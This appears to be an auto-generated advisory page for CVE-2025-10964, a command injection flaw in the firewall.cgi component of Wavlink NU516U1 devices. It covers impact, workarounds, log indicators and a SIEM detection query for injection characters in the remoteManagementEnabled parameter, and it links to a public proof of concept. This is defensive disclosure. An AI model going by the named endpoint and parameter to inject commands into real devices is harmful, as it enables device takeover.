CVE-2025-10964 – This vulnerability allows remote attackers to e... (How to Fix)

Q: What is the severity of CVE-2025-10964?

CVE-2025-10964 has a CVSS score of 6.3 (MEDIUM). This vulnerability allows remote attackers to execute arbitrary commands on Wavlink NU516U1 devices by exploiting a command injection flaw in the firewall.cgi component. Attackers can manipulate the remoteManagementEnabled parameter to inject malicious commands. All users of affected Wavlink NU516U1 devices are at risk.

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary commands on Wavlink NU516U1 devices by exploiting a command injection flaw in the firewall.cgi component. Attackers can manipulate the remoteManagementEnabled parameter to inject malicious commands. All users of affected Wavlink NU516U1 devices are at risk.

💻 Affected Systems

Products:

Wavlink NU516U1

Versions: All versions prior to patch (specific version unknown due to vendor non-response)

Operating Systems: Embedded Linux firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in default configuration of the firewall.cgi component.

📦 What is this software?

Wl Nu516u1 Firmware by Wavlink

View all CVEs affecting Wl Nu516u1 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing attackers to install persistent backdoors, pivot to internal networks, or use the device for botnet activities.

🟠

Likely Case

Unauthorized command execution leading to device configuration changes, data exfiltration, or denial of service.

🟢

If Mitigated

Limited impact if devices are behind firewalls with strict inbound filtering and command injection protections are implemented.

🌐 Internet-Facing: HIGH - Attack can be initiated remotely and exploit is publicly available.

🏢 Internal Only: MEDIUM - Still vulnerable to internal attackers or compromised internal systems.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Proof of concept available on GitHub, requires network access to device's web interface.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: UNKNOWN

Vendor Advisory: NONE

Restart Required: No

Instructions:

No official patch available. Vendor did not respond to disclosure. Consider replacing device or implementing strict network controls.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate Wavlink devices in separate VLAN with strict firewall rules blocking external access to management interfaces.

Access Control Lists

all

Implement ACLs to restrict access to device management interface to trusted IP addresses only.

🧯 If You Can't Patch

Disable remote management features completely if not required
Replace vulnerable devices with supported alternatives from responsive vendors

🔍 How to Verify

Check if Vulnerable:

Check device model and firmware version. If using Wavlink NU516U1 with unpatched firmware, assume vulnerable.

Check Version:

Check device web interface or console for firmware version information.

Verify Fix Applied:

No verification possible as vendor has not provided patch. Consider device replacement.

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to /cgi-bin/firewall.cgi with command injection patterns
Unexpected system command execution in device logs

Network Indicators:

HTTP requests to device management interface from unexpected sources
Outbound connections from device to suspicious IPs

SIEM Query:

source="wavlink_device" AND (url="/cgi-bin/firewall.cgi" AND (param="remoteManagementEnabled" AND value CONTAINS "|" OR value CONTAINS ";" OR value CONTAINS "`"))

📊 Metadata

CVE ID: CVE-2025-10964

CVSS v3 Score: 6.3 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CWE: CWE-74

EPSS Score: 0.43% exploit probability (62.1th percentile)

Published: September 25, 2025

Last Updated: October 7, 2025

🔗 References

https://github.com/panda666-888/vuls/blob/main/wavlink/nu516u1/websSysFirewall.md Exploit,Third Party Advisory
https://github.com/panda666-888/vuls/blob/main/wavlink/nu516u1/websSysFirewall.md#poc Exploit,Third Party Advisory
https://vuldb.com/?ctiid.325832 Permissions Required,VDB Entry
https://vuldb.com/?id.325832 Third Party Advisory,VDB Entry
https://vuldb.com/?submit.652785 Third Party Advisory,VDB Entry
https://github.com/panda666-888/vuls/blob/main/wavlink/nu516u1/websSysFirewall.md Exploit,Third Party Advisory
https://github.com/panda666-888/vuls/blob/main/wavlink/nu516u1/websSysFirewall.md#poc Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-10964, you might also want to check these: